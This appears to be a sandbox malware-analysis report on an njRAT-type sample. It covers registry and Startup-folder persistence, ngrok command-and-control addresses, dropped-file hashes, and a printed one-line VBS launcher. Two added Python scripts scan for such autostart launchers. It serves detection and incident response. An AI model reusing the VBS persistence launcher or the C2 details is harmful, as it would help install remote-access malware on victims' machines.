17:11:22 | AutostartRun | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
17:11:41 | AutostartRun | HKCU\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
17:11:44 | API Interceptor | 111980x Sleep call for process: WindowsServices.exe modified
17:11:49 | AutostartRun | HKLM\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
17:11:58 | AutostartRun | HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
17:12:07 | AutostartRun | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
Context: IPs (other analyses that contacted the same address)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.6.122.107 | RN2vknsx6G.exe | malicious | RedLine | 0.tcp.in.ngrok.io:17440/
3.6.115.182 | RN2vknsx6G.exe | malicious | RedLine | 0.tcp.in.ngrok.io:17440/
3.6.98.232 | ZB7Ot9MOic.exe | malicious | Njrat |
3.6.98.232 | etJZk4UQhS.exe | malicious | Njrat |
3.6.98.232 | jango.exe | malicious | XWorm |
3.6.98.232 | cracksetup.exe | malicious | Nanocore |
3.6.98.232 | LocalStaFvjUblU.exe | malicious | njRat |
3.6.98.232 | JsYdl3ZkOA.exe | malicious | njRat |
3.6.98.232 | ehqsU9jDFb.exe | malicious | njRat |
3.6.98.232 | EADSXus8Cw.exe | malicious | njRat |
3.6.98.232 | KPiASQ9E43.exe | malicious | Njrat |
3.6.98.232 | DDD24717592B5B34947AF56B9F84CD2CE01B0B2EFB62D.exe | malicious | njRat |
Context: domains (other analyses that contacted the same domain; context is the address it resolved to)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
0.tcp.in.ngrok.io | ZB7Ot9MOic.exe | malicious | Njrat | 3.6.30.85
0.tcp.in.ngrok.io | etJZk4UQhS.exe | malicious | Njrat | 3.6.122.107
0.tcp.in.ngrok.io | jango.exe | malicious | XWorm | 3.6.30.85
0.tcp.in.ngrok.io | cracksetup.exe | malicious | Nanocore | 3.6.98.232
0.tcp.in.ngrok.io | LocalStaFvjUblU.exe | malicious | njRat | 3.6.122.107
0.tcp.in.ngrok.io | 558EofiXYO.exe | malicious | njRat | 3.6.115.64
0.tcp.in.ngrok.io | JsYdl3ZkOA.exe | malicious | njRat | 3.6.115.64
0.tcp.in.ngrok.io | ehqsU9jDFb.exe | malicious | njRat | 3.6.115.182
0.tcp.in.ngrok.io | EADSXus8Cw.exe | malicious | njRat | 3.6.30.85
0.tcp.in.ngrok.io | KPiASQ9E43.exe | malicious | Njrat | 3.6.30.85
Context: ASNs (other analyses that contacted the same AS; context is the address contacted)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02 (US) | file.exe | malicious | Python Stealer, Monster Stealer | 54.241.95.51
AMAZON-02 (US) | a0650c66-3e59-b3ed-9a0d-9061398de55a.eml | malicious | Fake Captcha | 52.85.132.85
AMAZON-02 (US) | file.exe | malicious | LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT | 3.163.115.74
AMAZON-02 (US) | Inv & remit.xlsx | malicious | HTMLPhisher | 76.76.21.241
AMAZON-02 (US) | Inv & remit.xlsx | malicious | Unknown | 108.156.152.63
AMAZON-02 (US) | http://shjj.ysxo.phestoslevi.online/wr/#?service=bmFzc2ltLmdyaWJpQGNyb3dlLmNvLnVrJnJvYXIyJmM= | malicious | Unknown | 99.84.108.83
AMAZON-02 (US) | http://mediasiteconnect.com/site/dyslexia-southwest-2024/integratedLogin | malicious | Unknown | 13.249.120.62
AMAZON-02 (US) | https://script.google.com/macros/s/AKfycbyqeaWecVxl9bztwLn8C2J1NaiZk1cJk016HEld2UPz2Xqc6eSp0SzjZOQdPS1Ap8NQpQ/exec | malicious | Unknown | 52.46.155.15
AMAZON-02 (US) | dcsmio-OneDigital Health and Benefits-W2.docx | malicious | Unknown | 52.217.73.30
AMAZON-02 (US) | dcsmio-OneDigital Health and Benefits-W2.docx | malicious | Unknown | 52.216.41.80
                              No context
Context: dropped files (other analyses that dropped the same file)
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | l0HzgCOAMF.exe | malicious | Njrat
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | clSwWjTkJf.exe | malicious | Njrat
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | _____(NYCU_2307-19TW)#Ufffdpdf.exe | malicious | Nanocore, GuLoader, MailPassView, Remcos
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe | malicious | Nanocore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | 0473350311911207E#U00b7pdf.exe | malicious | NanoCore, GuLoader, MailPassView, Remcos
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exe | DLAWT.scr.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | l0HzgCOAMF.exe | malicious | Njrat
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | clSwWjTkJf.exe | malicious | Njrat
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | _____(NYCU_2307-19TW)#Ufffdpdf.exe | malicious | Nanocore, GuLoader, MailPassView, Remcos
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe | malicious | Nanocore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | 0473350311911207E#U00b7pdf.exe | malicious | NanoCore, GuLoader, MailPassView, Remcos
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe | malicious | NanoCore, GuLoader
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy) | DLAWT.scr.exe | malicious | NanoCore, GuLoader
                                                                      Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):525
                                                                      Entropy (8bit):5.259753436570609
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                      MD5:260E01CC001F9C4643CA7A62F395D747
                                                                      SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                      SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                      SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):525
                                                                      Entropy (8bit):5.259753436570609
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                      MD5:260E01CC001F9C4643CA7A62F395D747
                                                                      SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                      SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                      SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View (other analyses that dropped the same file):
• Filename: l0HzgCOAMF.exe, Detection: malicious
• Filename: clSwWjTkJf.exe, Detection: malicious
• Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious
• Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious
• Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious
• Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious
• Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious
• Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious
• Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious
• Filename: DLAWT.scr.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View (other analyses that dropped the same file):
• Filename: l0HzgCOAMF.exe, Detection: malicious
• Filename: clSwWjTkJf.exe, Detection: malicious
• Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious
• Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious
• Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious
• Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious
• Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious
• Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious
• Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious
• Filename: DLAWT.scr.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                      Category:dropped
                                                                      Size (bytes):162146
                                                                      Entropy (8bit):7.837696717909293
                                                                      Encrypted:false
                                                                      SSDEEP:3072:tf/J2ULiTehI8FrkZqFMzVg//AY30OKalUPRjejXrcyrD:32UL2i9FJkg//r0OKYUPR6fTD
                                                                      MD5:52B074E39E4F3BA00C230BA82EB62499
                                                                      SHA1:054A51BF0C25309A728A8BC14C77262168F134A1
                                                                      SHA-256:4C75F91C9974D712EF96B2F6BFE99EDC15F110DEA80065A59E161E639D08E74D
                                                                      SHA-512:FC2126F7FE2B8CC8EDF4DE3DD701D896C7F997DB67945647E907C08FE31A2EBD0EECC3A77746688AAC88BD7324C33E65C41A26F9973190A1437D5DC8D855AC4F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L.....\.................@...........9.......@....@..........................P...............................................G..\....@..............................................................................................................UPX0....................................UPX1.....@.......<..................@....rsrc........@.......@..............@......................................................................................................................................................................................................................................................................................................................................................................................3.05.UPX!....
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):116
                                                                      Entropy (8bit):4.886763621462936
                                                                      Encrypted:false
                                                                      SSDEEP:3:VfX9GTfmQKn0eFH5Os8pE2J5xAI6tHJUkn:VtGTfmQolFHIsZ23fOakn
                                                                      MD5:DEFA40E11A0ED2D15E035F651EE78204
                                                                      SHA1:8574FBF6B47E85A37121F9C2B6F2F7796D079DE7
                                                                      SHA-256:488EF782BCC9EDCF49A0C34FAA9C6E40122FBA1577C7FD13B14F597F5AA74864
                                                                      SHA-512:CC264DBFF646AD2B1B264A6BEC283887C017A4FB1A1EE15913756ACAE10C3063D3D8192FEE7F03B8055774E3B2FB6B3DC791A9AB43AD88CD1F24373269C6AF14
                                                                      Malicious:true
                                                                      Preview:on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: ..
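The behaviour timeline earlier on this page records five persistence points (a Startup-folder x.vbs, Run values under HKCU, HKLM and HKCU64 whose value name is the hash-like string bf497657d005804b657fde8dd2d0cb46, and an .exe copied into the Startup folder), and the 116-byte VBS record just above shows that x.vbs does nothing but launch C:\Users\user\AppData\Local\Temp\WindowsServices.exe. The Python below is an added example, not part of the Joe Sandbox report: it parses AutostartRun lines constructed from that timeline, resolves the Startup-folder script to the binary it runs, flags hash-named Run values, script files in the Startup folder and targets in user-writable directories, and then groups every persistence point by the binary that ultimately executes, which is how an analyst sees that four of the five entries lead to the same file. The log-line layout is copied from the timeline as printed; the user-writable path substrings and the STARTUP_VBS_PATH-to-body mapping are assumptions made for the example.

```python
"""Resolve and score sandbox AutostartRun entries, including a Startup-folder VBS launcher."""
import re
from dataclasses import dataclass, field

# Constructed from the report's behaviour timeline (trailing ".." truncation markers dropped)
AUTOSTART_LOG = r"""
17:11:22 AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
17:11:41 AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
17:11:49 AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
17:11:58 AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
17:12:07 AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
"""

# Constructed: the dropped x.vbs body as shown in the report's file preview (assumed path -> body mapping)
STARTUP_VBS_PATH = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
X_VBS_BODY = (r'on error resume next:CreateObject("WScript.Shell").Run '
              r'"C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: ' + "\r\n")

LOG_LINE = re.compile(r"^(?P<time>\d\d:\d\d:\d\d)\s+AutostartRun:\s+(?P<rest>.+?)\s*$")
REG_ENTRY = re.compile(r'^(?P<key>HK\S+)\s+(?P<name>\S+)\s+"(?P<target>[^"]+)"')
VBS_RUN = re.compile(r'\.Run\s+"([^"]+)"', re.IGNORECASE)
HASH_NAME = re.compile(r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}", re.IGNORECASE)
# Assumed heuristic: directories an unprivileged user can write to
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf")


@dataclass
class Autostart:
    time: str
    kind: str            # "registry" or "startup_folder"
    location: str        # registry key, or the file path inside the Startup folder
    value_name: str      # registry value name; "" for Startup-folder entries
    target: str          # what ultimately executes
    reasons: list = field(default_factory=list)


def parse_autostart(log):
    """One Autostart per AutostartRun line; registry lines carry key, value name and target."""
    entries = []
    for line in log.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        reg = REG_ENTRY.match(rest)
        if reg:
            entries.append(Autostart(m.group("time"), "registry", reg.group("key"),
                                     reg.group("name"), reg.group("target")))
        else:
            entries.append(Autostart(m.group("time"), "startup_folder", rest, "", rest))
    return entries


def vbs_run_targets(vbs_text):
    """Paths passed to WScript.Shell.Run in a launcher script."""
    return VBS_RUN.findall(vbs_text)


def resolve_launchers(entries, startup_files):
    """Replace a Startup-folder script's target with the binary the script runs."""
    for e in entries:
        if e.kind == "startup_folder" and e.location.lower().endswith(SCRIPT_EXT):
            targets = vbs_run_targets(startup_files.get(e.location, ""))
            if targets:
                e.target = targets[0]
                e.reasons.append("script launcher resolves to " + targets[0])
    return entries


def is_hash_like(name):
    return bool(HASH_NAME.fullmatch(name))


def in_user_writable(path):
    p = path.lower()
    return any(s in p for s in USER_WRITABLE)


def assess(entries):
    """Attach reasons to suspicious entries and return only the flagged ones."""
    flagged = []
    for e in entries:
        if e.value_name and is_hash_like(e.value_name):
            e.reasons.append("Run value named like a bare hash")
        if in_user_writable(e.target):
            e.reasons.append("target in a user-writable directory")
        if e.kind == "startup_folder" and e.location.lower().endswith(SCRIPT_EXT):
            e.reasons.append("script file in Startup folder")
        if e.reasons:
            flagged.append(e)
    return flagged


def persistence_map(entries):
    """Group persistence points by the binary they execute (case-insensitive path)."""
    by_target = {}
    for e in entries:
        by_target.setdefault(e.target.lower(), []).append(e.location)
    return by_target


def analyse(log=AUTOSTART_LOG, startup_files=None):
    """Return (flagged entries, target -> [persistence locations]) for a timeline."""
    if startup_files is None:
        startup_files = {STARTUP_VBS_PATH: X_VBS_BODY}
    entries = resolve_launchers(parse_autostart(log), startup_files)
    return assess(entries), persistence_map(entries)
```

Grouping by resolved target rather than by registry key is the useful part: a hash-named Run value alone is a weak signal, but the same binary in %TEMP% being referenced by a Startup-folder script and by three Run keys, while a second copy of the original dropper sits in the Startup folder, is the redundancy pattern that distinguishes this kind of RAT installer from an ordinary installer's single autostart entry.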
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):313
                                                                      Entropy (8bit):4.971939296804078
                                                                      Encrypted:false
                                                                      SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                      MD5:689E2126A85BF55121488295EE068FA1
                                                                      SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                      SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                      SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                      Malicious:false
                                                                      Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....
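The startup-folder launcher listed above (a one-line VBS that runs Temp\WindowsServices.exe with errors suppressed) is the persistence artifact a responder would hunt for on other hosts. What follows is an added example and not part of the Joe Sandbox report: a Python scan of the Windows Startup folders for script files that hand a user-writable path to WScript.Shell.Run. The launcher text is reconstructed from the report's Preview line (the report elides the rest of the script); the benign script, the file names and the temporary fixture directory are assumptions made for the demonstration.

```python
"""Startup-folder launcher hunt. Added example, not part of the report: finds
script files in the Windows Startup folders that hand a user-writable path to
WScript.Shell.Run, the persistence pattern the dropped VBS above uses."""
import os
import re
import tempfile
from pathlib import Path

# Constructed fixture text. SUSPECT_VBS reproduces the report's Preview line; the
# benign script and the file names are assumptions for the demonstration.
SUSPECT_VBS = ('on error resume next:CreateObject("WScript.Shell").Run '
               '"C:\\Users\\user\\AppData\\Local\\Temp\\WindowsServices.exe",1\r\n')
BENIGN_VBS = ('Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
              'WScript.Echo fso.GetDrive("C:").FreeSpace\r\n')

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
LAUNCH_RE = re.compile(r'CreateObject\("WScript\.Shell"\)\s*\.\s*Run\s+"([^"]+)"(?:\s*,\s*(\d+))?', re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|ProgramData|Users\\Public|Temp)\\", re.I)


def startup_dirs() -> list:
    """Per-user and all-users Startup folders on Windows; empty list elsewhere."""
    candidates = []
    if os.environ.get("APPDATA"):
        candidates.append(Path(os.environ["APPDATA"], "Microsoft", "Windows", "Start Menu", "Programs", "Startup"))
    if os.environ.get("PROGRAMDATA"):
        candidates.append(Path(os.environ["PROGRAMDATA"], "Microsoft", "Windows", "Start Menu", "Programs", "StartUp"))
    return [d for d in candidates if d.is_dir()]


def scan_startup(dirs) -> list:
    """One finding per script that launches something via WScript.Shell.Run, with risk flags."""
    findings = []
    for d in dirs:
        for p in sorted(Path(d).rglob("*")):
            if p.suffix.lower() not in SCRIPT_EXTS or not p.is_file():
                continue
            text = p.read_text(errors="replace")
            m = LAUNCH_RE.search(text)
            if not m:
                continue
            target = m.group(1)
            findings.append({
                "script": str(p),
                "target": target,
                "user_writable_target": bool(USER_WRITABLE_RE.search(target)),
                "silent_errors": "on error resume next" in text.lower(),   # hides a missing payload
                "window_style": int(m.group(2)) if m.group(2) else None,   # 0 = hidden, 1 = normal
            })
    return findings


def build_fixture() -> str:
    """Temporary stand-in for a Startup folder holding one launcher and one benign script."""
    d = tempfile.mkdtemp(prefix="startup_")
    Path(d, "WindowsServices.vbs").write_bytes(SUSPECT_VBS.encode())
    Path(d, "diskreport.vbs").write_bytes(BENIGN_VBS.encode())
    return d


if __name__ == "__main__":
    # On a Windows host this walks the real Startup folders; elsewhere it uses the fixture.
    for finding in scan_startup(startup_dirs() or [build_fixture()]):
        print(finding)
```

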